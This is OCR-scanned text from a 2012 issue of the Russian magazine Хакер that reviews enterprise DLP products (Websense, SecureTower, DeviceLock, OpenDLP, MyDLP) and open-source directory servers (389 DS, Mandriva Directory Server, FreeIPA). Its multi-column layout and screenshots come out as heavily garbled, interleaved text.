программы обмена IМ/Vо iР -сообщениями и Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а также пере ­

очередь на сре д ние и круnные компании со штатом свыше

500

сотрудников и государственные учреждения. Комплекс Webseпse

за счет контроля основных каналов обмена д анными позволя­

дача файлов по протоколам НТТ Р, НТТ РS и FТР ;

DSS

сетевая печать [SM В P гinting, NCP Pгintiпg , LPD, и т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет в реальном времени остановить утечку конфиденциальной ин­ формации . Он работает на основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила в

2006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую точность обнаружения конфиденциальных данных и не име­

Характер п ередаваемых да нн ых определяетс я путем обнару­

жения специфических признаков [метки, хе ш- фу н кции, грифы ] и анализа контента [статистический анализ, регулярные вы-

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются при помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

8dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 1 • IG • \2 • 2 • • • '

~-~

'11"~... .._

,) 12 • 2 • • • '

• 1 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

11Ь!88!-=- • 1rь.-.

ее

• - Р--а - з.--

Н аст рой ка разреше н и й в

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP с одер жит ряд

го то в ых n рав ил

115


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 5ecuгity Gatewayl. П оддерживается интеграция · с Act ive Diгectoгy, Novell eDiгectoгy и Lotus Domino. Совместно с Websense 055 используется ряд других приложений, рас ш иряю­ щих возможности ком пл екса DLP: Data Еndроiпt-устанавливается на конечные П К, где контро ­ лирует данные, передаваемые через U5B и при печати, попытки сделать скриншоты экрана, сообщения lM и т. д . ; Data Мопitог - осуществляет мониторинг каналов передачи, · чтобы о п ределить, кто, куда, как и что от пр авляет, и сопостави ть с политиками и бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой набор символов или слов документа или со д ержимо го полей

утечку данных на основе политик;

БД. Такой по д ход обеспечивает точную классификацию контента

Data Discoveг- программа для поиска и классификации конфи­

более чем для 400 форматов до кументов (включая та блицы СУБ Д

денциальныхданных, которую можно использовать как в составе

и сжа ты е файлы ! , да же если данные перенесены или конвертиро­

055, так и отдельно, не требуетустановки агентов.

ваны в другой формат. Кроме PгeciseiD, используются другие алго­ ритмы : словари, точное и частичное совпадение, статистический

Для управления всеми решениями Websense используется

анализ и т. д. Вместе с тем для анализа информации в продуктах

единая консоль Websense TRITON Coпsole (Java и Apache Tomcatl.

Websense nрименяется несколько технологий Deep Content Сопtгоl

Websense 055 очень просто устано вить . В архив уже входит М5 5QL 5ег v ег Expгess 2008 R2, но для больших сред лучше ис п ользовать

и T hгeat5eekeг (сканирова н ие веб-сайтов и обнаружение новых угроз).

полную версию. Первоначальная настройка политик производит­

П роизводится мониторинг основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена интеграция по ICAP с любым и нт ернет­

ся при помощи просто г о мастера, создающего шаблоны с учетом страны и харак т ера деятельности организации, в том числе имеют­

ся и региональные настройки для России .

шлюзом, поддерживающим это т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может устанавливаться в разрыв или использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию на инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения от о тв етственно г о сотрудника.

ОС сервер:

Система умеет блокировать передачу конфиденциальных данных,

ОС клиенты:

отправлять уведомление !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику или владельцу контентаl, запускать внешнюю про­

falconqaze.ru .

Windows 2003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь запрос н а п од тв ерж д ение отправки и др.

ским 000 «Фальконгейз>> . П редставляе т собой программный

Система присваивает ин ц иде нт у у никальны й номер и прикрепля­

продукт, использующий для поиска конфи д енциальной инфор­

ет к сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого и ста ти с т ическо­

с учетом бизнес -проц ессов ком п ании, а в комплекте поставки уже

го анализа (ключевые слова, регулярные выражения, отпечаток

имеется несколько д еся т ков шаблонов и н астроенных отчетов

и т. д.) . Обеспечивает контроль всех популярных каналов утечки

по инцидентам и активности п ользовате л ей. Продукты Websense

данных, в том числе о т слеживает за ш ифрова нны й трафик

отдельных сотрудников или групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 5МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если в организации используется М5 Exchange 2007/2010, то вся

документацию от внесения несанкционированных изменений.

внутренняя и внешняя переписка также проверяется на соот­

Остальные возможности включают п ринудительное шифрование

ветствие политикам. Особо хочется выделить полную поддерж­

позволяют ограничить доступ к опре д еленным сведениям для

электронной п оч ты (ч ерез шлюз! и совместную работу с други­

ку 5kype, ведь 5есuгеТоwег может перехватывать голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы и отправляемые 5М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать список файлов, в которых найдены

~1 предлагает комплекс инструментов

большого числа агентов упрощают профил и,

совпадения) и управлять работой агентов

для nредотвращения возможных утечек

содержащие правила сканирования.

!пауза сканированияидеинсталляция

информации с клиентских машин,

В правила х для описания объектов поиска

агента) . В текущей версии не производится

работающи х под управлением Windows . Для этого на подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а также

выражения , позволяющие обнаруживать

анализ информации, копируемой на внешний

устанавливается небольшой агент.

н о мера кредиток и паспортов ,

Само развертывание производится

пароли, выявлять наличие на ресурса х

документы в текстовом формате, хранящиеся

в автоматическом режиме через Netblos/SMB .

документов с конфиденциальными данными

на жестком диске ком па . Проект пока

Кроме того, возможно прямое сканирование

и отслеживать их обработку на внешних

находится в стадии активной разработки .

систем без установки агентов в

Windows !через SMB), *niх-системах ISSH) и СУБД IMS SQL и MySQL). Централизованное управление

сервисах IGoogle Docs , Gmail) . Администратор

Первая версия под номером

может настроить черный и белый список

в апреле 2010-го, текущая версия-

каталогов для сканирования и задать

Серверная часть написана на языке Регl , для

осуществляется при помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

обмен данными с агентом производится

В настоящее время интерфейс позволяет

и

по каналу связи, зашифрованному при

просматривать результаты сканирования

116

SSN ,

носитель , программа проверяет только

0.1

представлена

0.4.3 .

Apache Linux, для х ранения данных используется MySQL. Агент написан на языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

о --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

1Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

6]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

1tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

1[) ~

5о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

-- = . . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

6835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

631815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

== ::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 4 ........... 0.~

6.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

68И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

1IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

8cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В о

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 11111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики в консоли

Websense DSS

Не все DLP это умеют или обеспечивают в полном объеме !чащ е ус тановленный агент контролирует лишь текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния очень пр ос т , для управления , создания правил и анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может быть настроен выборочно: по IР­

Admiп Coпsole и консо ль безопасности

адресам или диапазонам, МАС-адресам, п ортам и протоколам,

Clie nt.

логинам, размеру файлов и т. д. Система распознает защи­

щенные па роле м документы MS Woгd/Excel, PDF и некоторые

правил , позволяющих выявить отправку ряда данных !номеров кредиток, ИН Н ], посещение соц с етей, отправку резюме для по­

типы архивов. Когда пользователь отправляет документ или

иска новой работы и др .

В ус тановленной системе активно несколько общих

архив, защищенный па рол ем, она генерирует событие и предо­ ста вляет администратору полную информацию и копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует данные , копируемые на внешние

Сайт nроекта:

ус тройства , печать на локальных и сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки при опре делении отправителя, SecuгeToweг, кроме общепринятой информации, пол уче нной из домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует все контактные данные, IР-адрес и период его

Русификация: ест~

использования, логин в различных месседжерах и т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

на основе до с таточно известного

система заводи т переанальные карто чки , с помощью которых

решения

вся собранная информация привязывается к учетным записям

сту па пользователей к различным периферийным устройствам.

!возможна интеграция с Active Diгe ctoгy ].

Device loc k разрешает/блокирует доступ с учетом следующих

Кроме того , SecuгeToweг имеет функции, не специфичные для

DLP,

но весьма востребованные в большинстве организаций. Та к,

с ее помощью можно контролировать работу сотрудников- си ­ стема периодически делает скрины эк ранов для послед ую щ е го

просмотра в х ронологическом поряд ке, о т слеживае т внутренние

используется для контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас это базовый элеме нт системы

DLP,

дополненный

о пциональным и модулями Netwoгklock !анализ данных , пере­ дава емых по сети ] и Coпtentlock !собственно, отвечает за ана­ лиз и филырацию данных]. Благодаря новым возможностям научился блоки ровать ус тройства , отслеживая в том

и внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, по зволяющие в дина мике наблюдать за сетевыми

числе и со д ержимое коп ируемы х данных , а не только логин

соб ытиями и активностью отдельных пользователей. На основе со­

п ольз ователя и прочие стандартные параметры . При этом раз­

бра нны х данны х очень легко выяснить , сколько времени сотрудни к

ные политики уста навливаются в зависимости от того, работает

потра тил на пустое общение, прен ебрегая своими служебными

ком пьютер в сети или автономно !оперативный и автономный режимы]. Система детально протоколирует все действия поль­

обяза нн остями, и когда это имело место. Функционально SecuгeToweг состоит из нескольких компонентов:

зова телей и осуществляет выборочное теневое копирование

се рв ер перехвата трафика- захватывает сетевой трафик

данных для анализа . Она распо з нает более

и пер е да ет его в баз у данны х для х ранения !наибо лее требова­

и использует несколько механизмов анализа контента: поиск

тельны й к ресурсам компонент];

по ключе вы м словам и шаблонам , в том числе с поддержкой

80

типов файлов

сервер контроля рабочих станций- используется для развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов на рабочие станции, мониторинга их работы

данные и т. д . ], словари, поиск по свойствам файлов и данных

и сбора информации, п ерех вач енной агентами lв том числе шиф ­

!название, размер , па роль, текст и др.]. Благодаря этому DLP

рованного трафика и данны х о работе с внешними устройствами];

может найти текст, сп рятанный, например, в графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию и анализ данны х, поиск , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств и протоколов и временные списки], позволяющие пользователю без проблем

ние отчетов и пр .

п олучи ть до с туп. Возможна интеграция с ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может быть использован Огасlе,

SQLite

MS SQL

Sегvег,

и PostgгeSQL. Система легко масштабируется, при

Go, PGP,

ТгuеСгурt и некоторыми другими .

Таким образом, можно разрешить записывать определенные док уме нты только на защищенные носители . Клиентская часть

необходимости в сеть можно до бавит ь н овый сервер, отвечаю­

также контролирует буфер обмена , PгintScгeeп , печать докумен­

щий за перехват или обработку данных. Пр оцесс развертыва-

тов и обнаружи вает работающие кейлоггеры.

ХАКЕР

03/158/2012

117


SYN/ACK

l'{j i..--UO'd-.....

-........ _,..._...,., т о...•• -~-.,....~--·""'-

~ ln.W.""~;ММ'

'\1ooooohold-ro.~,

~ lnoblo !INIМ. .....

n-ohold-fo<r.ь ......

1

_

z

""-·--,...-....., O ln .W..I'I- IM"f~

l11нo•МW-•""'f""' ..... '

l.] ln.W..UII.IUitO~

'"-•l>old-'--...,..• 1

Q ln_ТU.W..,ID,..._

"""''""""-"""~ ' -,

- ·- · ck-~-ol>old

...

~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

1

MyDLP

Просмотр снимков экрана в

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е грация с веб-nрокси [Squidl для фильтрации входящего и ис­

DPI [Deep Packet

lпspectioп, глубокий анализ па кетов! и умеет определять прото­

х од я щего веб-трафика , использование в качестве контентнога

колы вне зависимости от порта, поэтом у сис тема позволяет легко

ф ильтра для

соз давать политики для любого вида траф ика: веб-трафика,

сос т а вление списков

Postfix, MS Exchange, интеграция с Zimbгa; ACL на ос нове IР -адресов и шаблонов.

трафика соцсетей, файлового, почтов ого и !М-трафика. Распозна­ ются протоколы с инхронизации с мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc и iTuпes. В настоящее время в офици ­

альных с пи сках н ет поддержки Р2Р и

MyDLP умеет

обнар у живать и открывать зашиф­

Функ ционально система, n остроенная на

Skype.

Возможно использовать дополнительный компонент полно­

текстового п оиска

К ром е того ,

р ов анные файлы или файлы, закрытые паролем [если есть ключ!.

Devicelock Seaгch Sегvег [DLSSI, который

MyDLP,

состоит из четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся для

находит информацию в теневы х ко пия х и журналах. Управление

nерехвата ТСР-соединений и является основной для

производится при помощи гр у пповы х политик домена, поэто­

Написан на E гlang и

му клиенты автоматически п одх ватывают установки. Правил а

с и стеме, поддерживающей интерпретаторы.

создаются через редактор

На с л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена консоль

Епtегргisе Manageг, с nо собная nолучать данные

из любых LDАР-каталогов, в консоли

Console

Python,

MyDLP.

можетбытьустановлен на любой

MyDLP Endp oint - aгeнт, устанавливаемый на конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 32/64 - битные

тролирова т ь все критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е сос тояни е агентов. Такж е кли­

nечать, захват экрана, получение nрав администратора и т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, кто и какие

е нты могут уста навливаться с уже nрек онфигурирова нны ми

данные использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые периодически nодключаются к Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки и сбрасывают лог. Написан на РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 10.04 LTS. ОС клиенты: Windows ХР, Vista, 7 (x86/x64l.

не вызывает. Девиз

Бесnл~тная DLР-си с тема [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl с отк рытым исходным

ко дом, включающая ряд функций для пр едотвращения утечки

жайших nланах- POP/ IMAP, MSNMS/Jabbeг и MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 97-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR и др . ;

и архивов-ZIР,

7z,

даже небольшое видео руководство. П осле за n уска клиента в трее

Python-Magic , типа

Ubuntul, образ VMwaгe и реnозиторий Ubuntu 10.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные средства анализа, улучшенный интерфейс, каран т ин, функцию

ар х ивирования и обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование и карантин!; файлов

по МD5-хешу;

118

О реп nолностью о т ражает суть

невозможно. Проект предлагает установочный 150-образ [на базе

анализ nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

определение М 1М Е-типа по данным

Easy, Simple,

Документация проекта включает десяток мануалов, ес т ь

nоявляется значок, сnрятать который с п омощью штатных средств

данны х:

LibгeOffi ce

настроек и журнала собы т ий исnоль­

Процесс настройки и подключения клиентов трудностей

Русификация: отсутствует (возможна собственными силами!. эту аббревиатуру как

Adobe Flex, для хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, что

DLP- это

nрежде всего инструмент, позво­

ляющий значительно снизить риски, наличие ко т орого уже само

извлечение тек с та из файловбинарных форматов;

по себе дисциnлинирует сотрудников. Ожидать, что внедрение

обнаружение исходного кода [C /Cн/C#/Java/A DA и др.l; идентификация банковских счетов/кредитных карт, некоторых

такой системы гарантированно защитит от утечек , возникающи х

национальны х идентификационных номер ов;

захочет передать или вынести ценную информацию, он наверняка

в результате умышленных действий, тоже не стоит. Если инсайдер

применение пользовательски х правил и регулярных выражений,

найдет способ для этого, поэтому следует также ис n ользовать все

статистический анализ и байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 158/ 201 2


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , где в мире найти самые лучшие продукты . Вы знаете, что можете найти их рsщом , под маркой TASH


SYN/ACK

Сергей gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA до вер~:: 2.1.3 включи;ел

имеется СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени я следуе обновиться до

,

2 14

'' '' '' ''

\ \

'

-

о FгeeiPA

я

исnользуется А~

аутентификаци

и авторизац~~t для в решении о

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

не выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

установить

Sync. После установки

оnакета 389-dsдля 389DS конфигура~;ситить

следует за

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

в сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

120

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные связи

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

3,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 10 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста и

389

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна в работе

SERVER

Разработчики отмечают высок у ю производительность и мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, будет работать в Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 11, lrix, AIX, Windows и OSF/1 . обществом при спонсорской поддержке

1996

года

Red Hat. Базой для Netscape Оiгес tогу

одной сети может работать до четырех

конфликтов, балансировкой н агрузки и резервированием сервера . Поддерживаются работающие в режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег в

Active

Оiгесtогу

Win2k8 .

В настоящее время проект официально предлагает репази­

тарий и пакеты для RHEL/Fedoгa [подходят и для Ceпt05l. Кроме того, возможна установка в других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 11. Некоторые версии поддерживаюттакже Windows, lгix , AIX и 05 F/ 1. Однако развертывание и последующая поддержка

5егvег.

Он получил новое имя- F edoгa Оiгесtогу 5егvег- после того,

Red Hat. В 2009 году 389 Оiгесtогу 5егvег [389 по номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

38905 . В

равноправных мастер-серверов с автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

как права на него в

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix и сервисами

Сайт проекта:

послужил разрабатываемый с

е

году приобрела

проект снова изменил название на

в << неофициальных>> системах требует от админа уже некоторой

ассоциировался с Fedoгa, что, по мнению разработчиков, тормо­

подготовки.

зило развитие, в частности интеграцию в другие дистрибутивы.

Компоненты

На основе

38905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 5егvег [R H0 51 с техподдержкой 24/7. Возможности 389 05 включают полную поддержку пр отокола LDAPv3, 55 L/ТL5 - и 5А5 L­

38905

выпускаются по лицензии

GNU GPL,

но сер­

вер базируется на ряде продуктов с другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, что 389 05 является сос т авной частью F гee iPA- централизованного решения для управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией о nользователях и политиках и для аудита. Речь об

па роль) с

этом продукте пойдет чуть ниже.

Active Оiгесtогу [при условии, что на КД Win2k3/2k8 установлен компонент Windows 5yncl, разграничение доступа впло ть до отдель н ых а три бутов [и мя, гр уппа, IP и т. д .l В качестве криптадвижка используется библиотека N55 от Mozilla Pгoject. Конструктивно 38905 состоит из сервера каталогов [Саге Оiгесtогу 5егvег, СО51 и сервера администрирования [Admin 5егvегl. Задача последнего- управление всеми доступными С О5 , для чего пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, образ VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 5егvег [М О5 1 - простое в использо ­

лагается графическая консоль [389-coпsolel и утилиты командной строки. В

Linux консоль устанавливается автоматически [написана на Javal. Для управления из-под Win2k3/2k8 на сайте проекта сле­ дует скача ть пакет Windows Console.

вании решение, nозволяющее при помощи наглядного интерфейса уnравлять учетными записями пользователей и груnп, доступом

и сетевыми сервисам и . П о сути, это уд обная надстройка над

FUSIONDIRECTORY Поскольку доступ к исходному коду

GOsa

решение для управления, имеющее более

Четко определен список поддерживаемых

удобные инструменты для разработки,

дистрибутивов (DeЬian, CeпtOS

но и усовершенствовать документацию .

5/RHEL 5, Fedoгa 14/15, openSUSE 11.3/11 .4, SLES 111, и, главное,

приняли решение о создании более

В октябре 2011-го вышла версия FusionDiгec­

для каждого из них создан репозиторий ,

открытого и полностью поддерживаемого

toгy

сообществом фор ка для привлечения

началась совсем недавно, о каких -то особых

сторонних специалистов, а также обеспечения

функциональных отличиях от

для тех, кто не имеет отношения к компании

Gonicus GmbH,

был затруднен, разработчики

1.0.2, но,

так как работа над nроектом

GOsa

пока

обеспечивающий простую установку. Еще одно отличие заключается в официально поддерживаемых веб­

условий для написания плагинов под большее

говорить не nриходится. Документация , по сути,

серверах. Разработчики nредлагают готовые

количество приложений. Новый проект

состоит из пары руководств, но, учитывая

конфигурационные файлы для

получил название FusioпDiгectoгy ( fusiondiгec­

родство с

и

GOsa,

на стадии ознакомления

Lighttpd,

Apache2

возможна также установка

toгy. org l . Разработчики обещали не только

с FusionDiгectoгy можно использовать

на пgiпх , но настройки придется создавать

создать самое <<м ощное и универсальное >>

документацию на родительский проект.

самостоятельно.

ХАКЕР

03/158/2012

121


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 1989288883 GIO : 1989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 5dc4c446 - 62eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA= , AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

28118469281326Z krbpa s swordexpiration : 28118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc= t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA можно

LDAP- OpenLDAP,

Консоль управления

использовать консоль

хотя возможна и совместная работа с

38905.

Active

389 Directory Server

Diгectoгy и позволяющей централизованно управлять аутен­

Функционально может выстуnать в качестве РОС !уровня Windows NT41, LDAP-cepвepa с синхронизацией учетных заnисей и nар а ­

тификацией пользователей, устанавли в ать политики дост упа и ау­

лей, nолностью заменить

проектов, таких как дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- это симбиоз неск ольких опенсорсных

КегЬегоs и может быть исnользован для организации однократ ной

38905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом при финансовой подд ержке Red Hat, основан используемый в коммерческом дистриб утиве продукт IPA, который Red Hat пред ста вила общественности летом 2008 года. Впервые код FгeeiPA п оявился в составе Fedoгa 9 lмай 2008гоl, однако нормальная синхронизация с Active Diгectoгy на тот

аутентификации 15501. Разграничени е до сту nа для объектов уста­

момент еще не была реализована. На первых порах клиенты

навливается вnлоть до отдельных атрибутов: пользователь, гр уnпа,

могли подключаться вручную, но это было неудобно. В октябре

IР-адрес, время и т. д.

2009-го началась работа над нов ой веткой

Active

в нее. Клиентскими ОС могут служить

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов и ACL в 5amba, управлять совмес тным достуnом, nечатью на базе CUP5, доставкой nочты IPostfixl, конфигурировать 5quid и службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

и Мае

Особенно nриятно, что проблемы, преследовавшие компанию Mandгiva, не затронули

MD5

и nродукт nостоянно развивается.

и

2.0. Ее

финальная

версия была пред ста вл ена в конце марта 2011-го. День , в который был анонсирован релиз, запомнился многим пользователям

В последних версиях к указанным возможностям добавилось

как << F edoгa

у правление учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В настоящее время реализованы:

15 Test Da y»,

Linux

посвященный именно тестированию

совместную работу, централизованное хранение nубличных клю­

централизованное управление учетными записями п ользо ват е­

чей

лей, групп, компьютеро в и сер ви сов;

Open5SH , аудит,

политики паролей и многое другое. Модульная

архитектура nозволяет добавлять нужную функциональность или

управление дост упом к приложениям, устано вка политик па ро­

убирать из интерфейса лишнее.

лей и настроек КегЬегоs, управле ние правилами

